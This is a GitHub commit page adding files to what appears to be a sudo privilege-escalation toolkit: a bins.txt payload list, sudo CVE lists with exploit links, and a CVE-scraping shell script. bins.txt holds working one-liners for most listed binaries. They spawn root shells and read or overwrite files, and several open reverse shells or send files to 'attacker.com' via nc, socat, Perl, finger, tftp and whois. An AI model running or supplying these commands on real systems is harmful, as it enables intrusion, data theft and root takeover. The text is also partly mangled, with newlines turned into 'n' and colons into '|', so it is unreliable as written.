Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
@TH3xACE
TH3xACE committed Dec 7, 2018
1 parent b7e5d0c commit 1ce7a50
Show file tree
Hide file tree
Showing 5 changed files with 1,467 additions and 0 deletions.
108 changes: 108 additions & 0 deletions bins.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,108 @@
"apt"| "apt-get changelog aptn!/bin/shn",
"apt-get"| "apt-get changelog aptn!/bin/shn",
"aria2c"| "COMMAND='id'nTF=$(mktemp)necho "$COMMAND" > $TFnchmod +x $TFnaria2c --on-download-error=$TF http|//xn",
"ash"| "ash",
"awk"| "awk 'BEGIN {system("/bin/sh")}'",
"base64"| "LFILE=file_to_readnbase64 "$LFILE" | base64 --decoden",
"bash"| "bash",
"busybox"| "busybox sh",
"cat"| "LFILE=file_to_readncat "$LFILE"n",
"chmod"| "LFILE=file_to_changensudo chmod 0777 $LFILEn",
"chown"| "LFILE=file_to_changensudo chown $(id -un)|$(id -gn) $LFILEn",
"cp"| "LFILE=file_to_writenTF=$(mktemp)necho "DATA" > $TFnsudo cp $TF $LFILEn",
"cpulimit"| "cpulimit -l 100 -f /bin/sh",
"crontab"| "crontab -e",
"csh"| "csh",
"curl"| "LFILE=/tmp/file_to_readncurl file|//$LFILEn",
"cut"| "LFILE=file_to_readncut -d "" -f1 "$LFILE"n",
"dash"| "dash",
"date"| "LFILE=file_to_readndate -f $LFILEn",
"dd"| "LFILE=file_to_writenecho "DATA" | dd of=$LFILEn",
"diff"| "LFILE=file_to_readndiff --line-format=%L /dev/null $LFILEn",
"docker"| "sudo docker run --rm -v /home/$USER|/h_docs ubuntu n sh -c 'cp /bin/sh /h_docs/ && chmod +s /h_docs/sh' && ~/sh -pn",
"ed"| "edn!/bin/shn",
"emacs"| "emacs -Q -nw --eval '(term "/bin/sh")'",
"env"| "env /bin/sh",
"expand"| "LFILE=file_to_readnexpand "$LFILE"n",
"expect"| "expect -c 'spawn /bin/sh;interact'",
"facter"| "TF=$(mktemp -d)necho 'exec("/bin/sh")' > $TF/x.rbnFACTERLIB=$TF factern",
"find"| "find . -exec /bin/sh ; -quit",
"finger"| "RHOST=attacker.comnLFILE=file_to_sendnfinger "$(base64 $LFILE)@$RHOST"n",
"flock"| "flock -u / /bin/sh",
"fmt"| "LFILE=file_to_readnfmt -pNON_EXISTING_PREFIX "$LFILE"n",
"fold"| "LFILE=file_to_readnfold -w99999999 "$LFILE"n",
"ftp"| "ftpn!/bin/shn",
"gdb"| "gdb -nx -ex '!sh' -ex quit",
"git"| "PAGER='sh -c "exec sh 0<&1"' git -p help",
"head"| "LFILE=file_to_readnhead -c1G "$LFILE"n",
"ionice"| "ionice /bin/sh",
"jq"| "LFILE=file_to_readnjq -Rr . "$LFILE"n",
"ksh"| "ksh",
"ld.so"| "/lib/ld.so /bin/sh",
"less"| "less /etc/profilen!/bin/shn",
"ltrace"| "ltrace -b -L /bin/sh",
"lua"| "lua -e 'os.execute("/bin/sh")'",
"mail"| "TF=$(mktemp)necho "From nobody@localhost $(date)" > $TFnmail -f $TFn!/bin/shn",
"make"| "COMMAND='/bin/sh'nmake -s --eval=$'x|nt-'"$COMMAND"n",
"man"| "man mann!/bin/shn",
"more"| "TERM= more /etc/profilen!/bin/shn",
"mount"| "sudo mount -o bind /bin/sh /bin/mountnsudo mountn",
"mv"| "LFILE=file_to_writenTF=$(mktemp)necho "DATA" > $TFnsudo mv $TF $LFILEn",
"mysql"| "mysql -e '! /bin/sh'",
"nano"| "TF=$(mktemp)necho 'exec sh' > $TFnchmod +x $TFnnano -s $TF /etc/hostsn^Tn",
"nc"| "RHOST=attacker.comnRPORT=12345nsudo nc -e /bin/sh $RHOST $RPORTn",
"nice"| "nice /bin/sh",
"nl"| "LFILE=file_to_readnnl -bn -w1 -s '' $LFILEn",
"nmap"| "TF=$(mktemp)necho 'os.execute("/bin/sh")' > $TFnnmap --script=$TFn",
"node"| "node -e 'require("child_process").spawn("/bin/sh", {stdio| [0, 1, 2]});'n",
"od"| "LFILE=file_to_readnod -An -c -w9999 "$LFILE"n",
"perl"| "perl -e 'exec "/bin/sh";' " # "sudo /usr/bin/perl -e 'exec("/bin/bash")'" # "sudo /usr/perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">");open(STDOUT,">");open(STDERR,">");exec("/bin/sh -i");};'"
"pg"| "pg /etc/profilen!/bin/shn",
"php"| "export CMD="/bin/sh"nphp -r 'system(getenv("CMD"));'n",
"pico"| "TF=$(mktemp)necho 'exec sh' > $TFnchmod +x $TFnpico -s $TF /etc/hostsn^Tn",
"pip"| "TF=$(mktemp -d)necho 'import os; os.dup2(0, 1); os.dup2(0, 2); os.execl("/bin/sh", "sh")' > $TF/setup.pynpip install $TFn",
"puppet"| "puppet apply -e "exec { '/bin/sh -c "exec sh -i <$(tty) >$(tty) 2>$(tty)"'| }"n",
"python2"| "python2 -c 'import os; os.system("/bin/sh")'",
"python3"| "python3 -c 'import os; os.system("/bin/sh")'",
"red"| "red file_to_writenanDATAn.nwnqn",
"rlwrap"| "rlwrap /bin/sh",
"rpm"| "rpm --eval '%{lua|posix.exec("/bin/sh")}'",
"rpmquery"| "rpmquery --eval '%{lua|posix.exec("/bin/sh")}'",
"rsync"| "rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1|/dev/null",
"ruby"| "ruby -e 'exec "/bin/sh"'",
"scp"| "TF=$(mktemp)necho 'sh 0<&2 1>&2' > $TFnchmod +x "$TF"nscp -S $TF x y|n",
"sed"| "sed -n '1e exec sh 1>&0' /etc/hosts",
"setarch"| "setarch $(arch) /bin/sh",
"sftp"| "HOST=user@attacker.comnsftp $HOSTn!/bin/shn",
"shuf"| "LFILE=file_to_writenshuf -e DATA -o "$LFILE"n",
"smbclient"| "smbclient ipsharen!/bin/shn",
"socat"| "RHOST=attacker.comnRPORT=12345nsudo -E socat tcp-connect|$RHOST|$RPORT exec|sh,pty,stderr,setsid,sigint,sanen",
"sort"| "LFILE=file_to_readnsort -m "$LFILE"n",
"sqlite3"| "sqlite3 /dev/null '.shell /bin/sh'",
"ssh"| "ssh localhost $SHELL --noprofile --norc",
"stdbuf"| "stdbuf -i0 /bin/sh",
"strace"| "strace -o /dev/null /bin/sh",
"tail"| "LFILE=file_to_readntail -c1G "$LFILE"n",
"tar"| "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh",
"taskset"| "taskset 1 /bin/sh",
"tclsh"| "tclshnexec /bin/sh <@stdin >@stdout 2>@stderrn",
"tcpdump"| "COMMAND='id'nTF=$(mktemp)necho "$COMMAND" > $TFnchmod +x $TFntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TFn",
"tee"| "LFILE=file_to_writenecho DATA | ./tee -a "$LFILE"n",
"telnet"| "RHOST=attacker.comnRPORT=12345ntelnet $RHOST $RPORTn^]n!/bin/shn",
"tftp"| "RHOST=attacker.comnsudo -E tftp $RHOSTnput file_to_sendn",
"time"| "/usr/bin/time /bin/sh",
"timeout"| "timeout 7d /bin/sh",
"ul"| "LFILE=file_to_readnul "$LFILE"n",
"unexpand"| "LFILE=file_to_readnunexpand -t99999999 "$LFILE"n",
"uniq"| "LFILE=file_to_readnuniq "$LFILE"n",
"unshare"| "unshare /bin/sh",
"vi"| "vi -c '|!/bin/sh'",
"vim"| "vim -c '|!/bin/sh'",
"watch"| "watch -x sh -c 'reset; exec sh 1>&0 2>&0'",
"wget"| "export URL=http|//attacker.com/file_to_getnexport LFILE=file_to_savensudo -E wget $URL -O $LFILEn",
"whois"| "RHOST=attacker.comnRPORT=12345nLFILE=file_to_savenwhois -h $RHOST -p $RPORT > "$LFILE"n",
"wish"| "wishnexec /bin/sh <@stdin >@stdout 2>@stderrn",
"xargs"| "xargs -a /dev/null sh",
"xxd"| "LFILE=file_to_writenecho DATA | xxd | xxd -r - "$LFILE"n",
"zip"| "TF=$(mktemp -u)nzip $TF /etc/hosts -T -TT 'sh #'nrm $TFn",
"zsh"| "zsh"
1 change: 1 addition & 0 deletions cve.sudo.manual.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
CVE-2015-5602 + https://www.exploit-db.com/exploits/37710/ | https://github.com/t0kx/privesc-CVE-2015-5602 + 1.6 1.6.1 1.6.2 1.6.3 1.6.3p1 1.6.3p2 1.6.3p3 1.6.3p4 1.6.3p5 1.6.3p6 1.6.3p7 1.6.4p1 1.6.4p2 1.6.5p1 1.6.5p2 1.6.7p5 1.6.8p1 1.6.8p2 1.6.8p5 1.6.8p7 1.6.8p8 1.6.8p9 1.6.8p12 1.6.9p17 1.6.9p18 1.6.9p19 1.6.9p20 1.6.9p21 1.6.9p22 1.7.0 1.7.1 1.7.2 1.7.2p1 1.7.2p2 1.7.2p3 1.7.2p4 1.7.3 1.7.4 1.7.5 1.7.6 1.7.7 1.7.8 1.7.9 1.7.10 1.8.0 1.8.1 1.8.2 1.8.3 1.8.4 1.8.5 1.8.6 1.8.7 1.8.8 1.8.9 1.8.10 1.8.11 1.8.12 1.8.13 1.8.14 <=1.8.14
33 changes: 33 additions & 0 deletions cve.sudo2.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
CVE-2016-7032 + https://www.securityfocus.com/bid/95776/exploit - https://bugzilla.redhat.com/show_bug.cgi?id=1372830 + 1.6.8 1.6.9 1.7.0 1.7.1 1.7.2 1.7.3 1.7.4 1.7.5 1.7.6 1.7.7 1.7.8 1.7.9 1.7.10 1.8.0 1.8.1 1.8.2 1.8.3 1.8.4 1.8.5 1.8.6 1.8.7 1.8.8 1.8.9 1.8.10 1.8.11 1.8.12 1.8.13 1.8.14
CVE-2014-0106 + https://www.securityfocus.com/bid/65997/exploit + 1.6.9p23 1.6.9 1.6.9p20 1.6.9p21 1.6.9p22 1.7.0 1.7.1 1.7.2p2 1.7.2p3 1.7.2p4 1.7.2p5 1.7.2 1.7.2p6 1.7.2p1 1.7.2p7 1.7.3b1 1.7.4p4 1.7.4p5 1.7.4 1.7.4p6 1.7.4p1 1.7.4p2 1.7.4p3 1.7.5 1.7.6p1 1.7.6p2 1.7.6 1.7.7 1.7.8p2 1.7.8 1.7.8p1 1.7.9 1.7.9p1 1.7.10p5 1.7.10 1.7.10p6 1.7.10p1 1.7.10p7 1.7.10p2 1.7.10p8 1.7.10p3 1.7.10p9 1.7.10p4 1.7.10p10 1.8.0 1.8.1 1.8.1p1 1.8.1p2 1.8.2 1.8.3 1.8.3p1 1.8.3p2 1.8.4p2 1.8.4p3 1.8.4p4 1.8.4p5 1.8.4 1.8.4p1
CVE-2013-2777 + [URL] + 1.3.5 1.6 1.6.1 1.6.2p3 1.6.2 1.6.3 1.6.3p7 1.6.4p2 1.6.4 1.6.5 1.6.6 1.6.7 1.6.7p5 1.6.8p12 1.6.8 1.6.9p20 1.6.9 1.6.9p22 1.6.9p21 1.6.9p23 1.7.0 1.7.1 1.7.2p1 1.7.2p5 1.7.2p7 1.7.2p4 1.7.2p2 1.7.2p3 1.7.2 1.7.2p6 1.7.3b1 1.7.4 1.7.4p1 1.7.4p4 1.7.4p5 1.7.4p6 1.7.4p2 1.7.4p3 1.7.5 1.7.6 1.7.6p2 1.7.6p1 1.7.7 1.7.8p1 1.7.8 1.7.8p2 1.7.9p1 1.7.9 1.7.10p4 1.7.10 1.7.10p1 1.7.10p2 1.7.10p3 1.8.0 1.8.1 1.8.1p1 1.8.1p2 1.8.2 1.8.3 1.8.3p1 1.8.3p2 1.8.4p2 1.8.4p3 1.8.4p4 1.8.4p5 1.8.4 1.8.4p1 1.8.5 1.8.6 1.8.6p1 1.8.6p2 1.8.6p3 1.8.6p4 1.8.6p5
CVE-2013-2776 + [URL] + 1.3.5 1.6 1.6.1 1.6.2p3 1.6.2 1.6.3 1.6.3p7 1.6.4 1.6.4p2 1.6.5 1.6.6 1.6.7p5 1.6.7 1.6.8 1.6.8p12 1.6.9 1.6.9p22 1.6.9p21 1.6.9p23 1.6.9p20 1.7.0 1.7.1 1.7.2p2 1.7.2p3 1.7.2 1.7.2p6 1.7.2p1 1.7.2p5 1.7.2p7 1.7.2p4 1.7.3b1 1.7.4p4 1.7.4p5 1.7.4p6 1.7.4p2 1.7.4p3 1.7.4 1.7.4p1 1.7.5 1.7.6p2 1.7.6p1 1.7.6 1.7.7 1.7.8p2 1.7.8p1 1.7.8 1.7.9p1 1.7.9 1.7.10 1.7.10p1 1.7.10p2 1.7.10p3 1.7.10p4 1.7.10p5 1.8.0 1.8.1 1.8.1p1 1.8.1p2 1.8.2 1.8.3p2 1.8.3 1.8.3p1 1.8.4p4 1.8.4p5 1.8.4 1.8.4p1 1.8.4p2 1.8.4p3 1.8.5 1.8.6 1.8.6p1 1.8.6p2 1.8.6p3 1.8.6p4 1.8.6p5
CVE-2013-1776 + [URL] + 1.3.5 1.6 1.6.1 1.6.2 1.6.2p3 1.6.3 1.6.3p7 1.6.4p2 1.6.4 1.6.5 1.6.6 1.6.7p5 1.6.7 1.6.8 1.6.8p12 1.6.9p23 1.6.9p20 1.6.9 1.6.9p22 1.6.9p21 1.7.0 1.7.1 1.7.2 1.7.2p1 1.7.2p7 1.7.2p4 1.7.2p6 1.7.2p2 1.7.2p5 1.7.2p3 1.7.3b1 1.7.4p4 1.7.4p5 1.7.4p6 1.7.4p2 1.7.4p3 1.7.4 1.7.4p1 1.7.5 1.7.6p2 1.7.6p1 1.7.6 1.7.7 1.7.8p2 1.7.8p1 1.7.8 1.7.9p1 1.7.9 1.7.10 1.8.0 1.8.1 1.8.1p1 1.8.1p2 1.8.2 1.8.3 1.8.3p1 1.8.3p2 1.8.4p2 1.8.4p3 1.8.4p4 1.8.4p5 1.8.4 1.8.4p1 1.8.5
CVE-2013-1775 + [URL] + 1.6 1.6.1 1.6.2 1.6.2p3 1.6.3p7 1.6.3 1.6.4p2 1.6.4 1.6.5 1.6.6 1.6.7 1.6.7p5 1.6.8 1.6.8p12 1.6.9p20 1.6.9p22 1.6.9 1.6.9p21 1.6.9p23 1.7.0 1.7.1 1.7.2 1.7.2p4 1.7.2p6 1.7.2p2 1.7.2p1 1.7.2p7 1.7.2p3 1.7.2p5 1.7.3b1 1.7.4p2 1.7.4p3 1.7.4p5 1.7.4 1.7.4p1 1.7.4p4 1.7.4p6 1.7.5 1.7.6 1.7.6p1 1.7.6p2 1.7.7 1.7.8p1 1.7.8p2 1.7.8 1.7.9 1.7.9p1 1.7.10p1 1.7.10p2 1.7.10p3 1.7.10p4 1.7.10p5 1.7.10 1.7.10p6 1.8.0 1.8.1 1.8.1p1 1.8.1p2 1.8.2 1.8.3p2 1.8.3 1.8.3p1 1.8.4p4 1.8.4p5 1.8.4 1.8.4p1 1.8.4p2 1.8.4p3 1.8.5 1.8.5p1 1.8.5p2 1.8.5p3 1.8.6p5 1.8.6 1.8.6p6 1.8.6p1 1.8.6p2 1.8.6p3 1.8.6p4
CVE-2012-3440 + [URL] + 1.7.2
CVE-2012-2337 + https://www.securityfocus.com/bid/53569/exploit + 1.6 1.6.1 1.6.2p3 1.6.2 1.6.3 1.6.3p7 1.6.4 1.6.4p2 1.6.5 1.6.6 1.6.7 1.6.7p5 1.6.8p12 1.6.8 1.6.9 1.6.9p20 1.6.9p21 1.6.9p22 1.6.9p23
CVE-2012-0809 + https://www.exploit-db.com/exploits/18436/ - https://www.exploit-db.com/exploits/25134/ + 1.8.0 1.8.1 1.8.1p1 1.8.1p2 1.8.2 1.8.3 1.8.3p1
CVE-2011-0010 + [URL] + 1.7.0 1.7.1 1.7.2p3 1.7.2p4 1.7.2p5 1.7.2 1.7.2p6 1.7.2p1 1.7.2p7 1.7.2p2 1.7.3b1 1.7.4 1.7.4p1 1.7.4p2 1.7.4p3 1.7.4p4
CVE-2011-0008 + [URL] + 1.3.1 1.5 1.5.2 1.5.3 1.5.6 1.5.7 1.5.8 1.5.9 1.6 1.6.1 1.6.2p2 1.6.2p1 1.6.2p3 1.6.2 1.6.3p2 1.6.3p5 1.6.3 1.6.3p7 1.6.3p4 1.6.3p6 1.6.3p1 1.6.3p7 1.6.3p6 1.6.3p2 1.6.3p3 1.6.3p1 1.6.3p3 1.6.3p5 1.6.3p4 1.6.4p2 1.6.4p1 1.6.4p2 1.6.4p1 1.6.4 1.6.5p1 1.6.5 1.6.5p2 1.6.5p2 1.6.5p1 1.6.6 1.6.7p2 1.6.7 1.6.7p1 1.6.7p4 1.6.7p5 1.6.7p5 1.6.7p3 1.6.8p8 1.6.8p3 1.6.8 1.6.8p4 1.6.8p9 1.6.8p2 1.6.8p2 1.6.8p10 1.6.8p5 1.6.8p9 1.6.8p5 1.6.8p11 1.6.8p1 1.6.8p7 1.6.8p1 1.6.8p12 1.6.8p7 1.6.8p6 1.6.8p12 1.6.8p8 1.6.9p22 1.6.9p11 1.6.9p1 1.6.9p14 1.6.9p21 1.6.9p4 1.6.9p19 1.6.9p13 1.6.9p2 1.6.9p17 1.6.9p21 1.6.9p23 1.6.9p20 1.6.9p5 1.6.9p8 1.6.9p15 1.6.9p3 1.6.9p6 1.6.9p16 1.6.9p18 1.6.9p10 1.6.9p19 1.6.9p22 1.6.9p7 1.6.9p9 1.6.9p18 1.6.9p12 1.6.9p20 1.6.9 1.6.9p17 1.7.0 1.7.1 1.7.2p2 1.7.2p3 1.7.2 1.7.2p6 1.7.2p1 1.7.2p5 1.7.2p7 1.7.2p4 1.7.3b1 1.7.4p2 1.7.4p3 1.7.4 1.7.4p1 1.7.4p4 1.7.4p5 1.7.4p5
CVE-2010-2956 + [URL] + 1.7.0 1.7.1 1.7.2p5 1.7.2 1.7.2p6 1.7.2p1 1.7.2p7 1.7.2p2 1.7.2p3 1.7.2p4 1.7.3b1 1.7.4p1 1.7.4p2 1.7.4p3 1.7.4
CVE-2010-1646 + [URL] + 1.3.1 1.6 1.6.1 1.6.2p1 1.6.2p2 1.6.2p3 1.6.2 1.6.3p7 1.6.3p2 1.6.3p3 1.6.3p4 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.4 1.6.4p1 1.6.4p2 1.6.5p2 1.6.5 1.6.5p1 1.6.6 1.6.7p3 1.6.7p4 1.6.7p5 1.6.7 1.6.7p1 1.6.7p2 1.6.8p8 1.6.8p3 1.6.8p9 1.6.8p4 1.6.8p10 1.6.8p5 1.6.8 1.6.8p11 1.6.8p6 1.6.8p1 1.6.8p12 1.6.8p7 1.6.8p2 1.6.9 1.6.9p11 1.6.9p22 1.6.9p6 1.6.9p17 1.6.9p1 1.6.9p12 1.6.9p7 1.6.9p18 1.6.9p2 1.6.9p13 1.6.9p8 1.6.9p19 1.6.9p3 1.6.9p14 1.6.9p9 1.6.9p20 1.6.9p4 1.6.9p15 1.6.9p10 1.6.9p21 1.6.9p5 1.6.9p16 1.7.0 1.7.1 1.7.2p2 1.7.2p3 1.7.2p4 1.7.2p5 1.7.2 1.7.2p6 1.7.2p1 1.7.2p7
CVE-2010-1163 + https://www.securityfocus.com/bid/39468/exploit + 1.6.8p8 1.6.8 1.6.8p9 1.6.8p1 1.6.8p12 1.6.8p2 1.6.8p7 1.6.8p5 1.6.8p7 1.6.9p18 1.6.9p19 1.6.9p20 1.6.9p21 1.6.9p22 1.6.9p17 1.7.0 1.7.1 1.7.2p1 1.7.2p2 1.7.2p3 1.7.2p4
CVE-2010-0427 + [URL] + 1.6 1.6.1 1.6.2 1.6.3p3 1.6.3p4 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.3p7 1.6.3p2 1.6.4p2 1.6.4p1 1.6.5 1.6.5p1 1.6.5p2 1.6.6 1.6.7 1.6.7p5 1.6.8p8 1.6.8p9 1.6.8p12 1.6.8 1.6.8p1 1.6.8p5 1.6.9p17 1.6.9p18 1.6.9p19
CVE-2010-0426 + [URL] + 1.6 1.6.1 1.6.2 1.6.3p7 1.6.3p2 1.6.3p3 1.6.3p4 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.4p1 1.6.4p2 1.6.5p1 1.6.5p2 1.6.7p5 1.6.8p9 1.6.8p1 1.6.8p12 1.6.8p2 1.6.8p5 1.6.8p7 1.6.8p8 1.6.9p17 1.6.9p18 1.6.9p19 1.7.0 1.7.1 1.7.2 1.7.2p1 1.7.2p2 1.7.2p3
CVE-2009-0034 + https://www.cvedetails.com/cve/CVE-2009-0034/ + 1.6.9p17 1.6.9p18 1.6.9p19
CVE-2007-4305 + [URL] + 1.5.6 1.5.7 1.5.8 1.5.9 1.6 1.6.1 1.6.2 1.6.3p2 1.6.3p7 1.6.3p4 1.6.3p1 1.6.3p6 1.6.3p3 1.6.3 1.6.3p5 1.6.3p2 1.6.3p7 1.6.3p4 1.6.3p1 1.6.3p6 1.6.3p3 1.6.3p5 1.6.4p2 1.6.4p1 1.6.4p2 1.6.4 1.6.4p1 1.6.5p2 1.6.5p1 1.6.5p2 1.6.5p1 1.6.5 1.6.6 1.6.7p5 1.6.7 1.6.8p8 1.6.8p2 1.6.8 1.6.8p12 1.6.8p1 1.6.8p9 1.6.8p5 1.6.8p7 1.6
CVE-2007-3149 + https://www.securityfocus.com/bid/24368/exploit + 1.6.8p12
CVE-2006-0151 + https://www.securityfocus.com/bid/16184/discuss - https://downloads.securityfocus.com/vulnerabilities/exploits/sudo_local_perl_root.txt - https://downloads.securityfocus.com/vulnerabilities/exploits/sudo_local_python_exploit.txt + 1.5.6 1.5.7 1.5.8 1.5.9 1.6 1.6.1 1.6.2 1.6.3 1.6.3p5 1.6.3p1 1.6.3p6 1.6.3p2 1.6.3p3 1.6.3p7 1.6.3p4 1.6.4p1 1.6.4p2 1.6.4 1.6.5 1.6.5p1 1.6.5p2 1.6.6 1.6.7 1.6.7p5 1.6.8p5 1.6.8p7 1.6.8p8 1.6.8 1.6.8p9 1.6.8p1 1.6.8p12 1.6.8p2
CVE-2005-4158 + [URL] + 1.5.6 1.5.7 1.5.8 1.5.9 1.6 1.6.1 1.6.2 1.6.3p4 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.3p7 1.6.3p2 1.6.3p3 1.6.4p2 1.6.4 1.6.4p1 1.6.5 1.6.5p1 1.6.5p2 1.6.6 1.6.7 1.6.7p5 1.6.8p7 1.6.8p8 1.6.8p9 1.6.8 1.6.8p1 1.6.8p5
CVE-2005-2959 + [URL] + 1.6 1.6.1 1.6.2 1.6.3p3 1.6.3p5 1.6.3p4 1.6.3p6 1.6.3p1 1.6.3p5 1.6.3p7 1.6.3p2 1.6.3p6 1.6.3p1 1.6.3p3 1.6.3p7 1.6.3p2 1.6.3 1.6.3p4 1.6.4p1 1.6.4p2 1.6.4p1 1.6.4p2 1.6.4 1.6.5p1 1.6.5p2 1.6.5p1 1.6.5p2 1.6.5 1.6.6 1.6.7 1.6.7p5 1.6.8
CVE-2005-1993 + [URL] + 1.3.1 1.5.6 1.5.7 1.5.8 1.5.9 1.6 1.6.1 1.6.2 1.6.3p7 1.6.3p2 1.6.3p3 1.6.3p4 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.4 1.6.4p1 1.6.4p2 1.6.5p1 1.6.5p2 1.6.5 1.6.6 1.6.7 1.6.7p5 1.6.8p1 1.6.8p7 1.6.8p8 1.6.8
CVE-2005-1831 + https://marc.info/?l=bugtraq&m=111755694008928[URL]w=2 + 1.6.8p7
CVE-2005-1119 + [URL] + 1.5.6 1.5.7 1.5.8 1.5.9 1.6 1.6.1 1.6.2 1.6.3p5 1.6.3p4 1.6.3p3 1.6.3p2 1.6.3p7 1.6.3p1 1.6.3p6 1.6.3 1.6.4p1 1.6.4 1.6.4p2 1.6.5 1.6.5p2 1.6.5p1 1.6.6 1.6.7 1.6.7p5 1.6.8p1 1.6.8p8 1.6.8
CVE-2004-1689 + [URL] + 1.6.8
CVE-2004-1051 + https://marc.info/?l=bugtraq&m=110028877431192[URL]w=2 + 1.5.6 1.5.7 1.5.8 1.5.9 1.6 1.6.1 1.6.2 1.6.3p4 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.3p7 1.6.3p2 1.6.3p3 1.6.4p2 1.6.4 1.6.4p1 1.6.5 1.6.5p1 1.6.5p2 1.6.6 1.6.7 1.6.8 1.6.8p1
CVE-2002-0184 + https://www.exploit-db.com/exploits/21420/ + 1.5.9 1.6 1.6.1 1.6.2 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.3p7 1.6.3p2 1.6.3p3 1.6.3p4 1.6.4 1.6.4p1 1.6.4p2 1.6.5 1.6.5p1 1.6.5p2
CVE-2002-0043 + https://marc.info/?l=bugtraq&m=101120193627756[URL]w=2 + 1.6 1.6.1 1.6.2 1.6.3p5 1.6.3 1.6.3p6 1.6.3p1 1.6.3p7 1.6.3p2 1.6.3p3 1.6.3p4
CVE-1999-1496 + [URL] + 1.5
CVE-1999-0958 + https://marc.info/?l=bugtraq&m=88465708614896[URL]w=2 + 1.5 1.5.2 1.5.3

CVE-2015-5602 + https://www.exploit-db.com/exploits/37710/ | https://github.com/t0kx/privesc-CVE-2015-5602 + 1.6 1.6.1 1.6.2 1.6.3 1.6.3p1 1.6.3p2 1.6.3p3 1.6.3p4 1.6.3p5 1.6.3p6 1.6.3p7 1.6.4p1 1.6.4p2 1.6.5p1 1.6.5p2 1.6.7p5 1.6.8p1 1.6.8p2 1.6.8p5 1.6.8p7 1.6.8p8 1.6.8p9 1.6.8p12 1.6.9p17 1.6.9p18 1.6.9p19 1.6.9p20 1.6.9p21 1.6.9p22 1.7.0 1.7.1 1.7.2 1.7.2p1 1.7.2p2 1.7.2p3 1.7.2p4 1.7.3 1.7.4 1.7.5 1.7.6 1.7.7 1.7.8 1.7.9 1.7.10 1.8.0 1.8.1 1.8.2 1.8.3 1.8.4 1.8.5 1.8.6 1.8.7 1.8.8 1.8.9 1.8.10 1.8.11 1.8.12 1.8.13 1.8.14 <=1.8.14
73 changes: 73 additions & 0 deletions cve_update.sh
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
#! /bin/sh
# to update the sudo's CVEs database


rm cve.sudo2.txt

wget -O cve_list.html -t 2 https://www.cvedetails.com/vulnerability-list.php?vendor_id=118

cat cve_list.html | grep 'CVE-' | grep "href=" | cut -d"=" -f 2 | sed 's/ title/ /g' | sed 's/"//g' | sed 's/\/c/https:\/\/www.cvedetails.com\/c/g' > cve_url.txt

cat cve_url.txt | while read line

do

var_cve=$( echo -n "$line" |cut -d "/" -f5 )

# echo -n " + "
# echo $var_cve

echo -n $var_cve >> cve_list.txt
echo -n " + [URL] + " >> cve_list.txt

# curl $line | grep 'title="Todd Miller Sudo ' | cut -d "=" -f 3 | cut -d '"' -f 2 >> cve_list.txt

curl $line | grep 'title="Todd Miller Sudo ' | cut -d "=" -f 3 | cut -d '"' -f 2 | tr '\n' ' ' >> cve_list.txt

# curl $line | grep 'title="Todd Miller Sudo ' | cut -d "=" -f 3 | cut -d '"' -f 2 | tr '\n' ' ' | sed 's/ CVE/\n CVE/g' | sed 's/Todd Miller Sudo / /g' | sed 's/ P/p/g' >> cve_list.txt

done


cat cve_list.txt | sed 's/ CVE/\n CVE/g' | sed 's/Todd Miller Sudo / /g' | sed 's/ P/p/g' >> cve.sudo2.txt
echo "\n" >> cve.sudo2.txt
cat cve.sudo.manual.txt >> cve.sudo2.txt

sed -in '{/CVE-1999-0958/s/\[URL\]/https:\/\/marc.info\/?l=bugtraq\&m=88465708614896&w=2/g}' cve.sudo2.txt

sed -in '{/CVE-2002-0043/s/\[URL\]/https:\/\/marc.info\/?l=bugtraq\&m=101120193627756&w=2/g}' cve.sudo2.txt

sed -in '{/CVE-2002-0184/s/\[URL\]/https:\/\/www.exploit-db.com\/exploits\/21420\//g}' cve.sudo2.txt

sed -in '{/CVE-2004-1051/s/\[URL\]/https:\/\/marc.info\/?l=bugtraq\&m=110028877431192&w=2/g}' cve.sudo2.txt

sed -in '{/CVE-2005-1831/s/\[URL\]/https:\/\/marc.info\/?l=bugtraq\&m=111755694008928&w=2/g}' cve.sudo2.txt

sed -in '{/CVE-2006-0151/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/16184\/discuss - https:\/\/downloads.securityfocus.com\/vulnerabilities\/exploits\/sudo_local_perl_root.txt - https:\/\/downloads.securityfocus.com\/vulnerabilities\/exploits\/sudo_local_python_exploit.txt/g}' cve.sudo2.txt

sed -in '{/CVE-2007-3149/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/24368\/exploit/g}' cve.sudo2.txt

sed -in '{/CVE-2012-0809/s/\[URL\]/https:\/\/www.exploit-db.com\/exploits\/18436\/ - https:\/\/www.exploit-db.com\/exploits\/25134\//g}' cve.sudo2.txt

sed -in '{/CVE-2012-2337/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/53569\/exploit/g}' cve.sudo2.txt

sed -in '{/CVE-2017-1000368/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/98838\/info/g}' cve.sudo2.txt

sed -in '{/CVE-2009-0034/s/\[URL\]/https:\/\/www.cvedetails.com\/cve\/CVE-2009-0034\//g}' cve.sudo2.txt

sed -in '{/CVE-2010-1163/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/39468\/exploit/g}' cve.sudo2.txt

sed -in '{/CVE-2016-7032/s/\[URL\]/https:\/\/www.securityfocus.com\/bid\/95776\/exploit - https:\/\/bugzilla.redhat.com\/show_bug.cgi?id=1372830/g}' cve.sudo2.txt

sed -in '{/CVE-2017-1000367/s/\[URL\]/ https:\/\/bugzilla.redhat.com\/show_bug.cgi?id=1372830/g}' cve.sudo2.txt

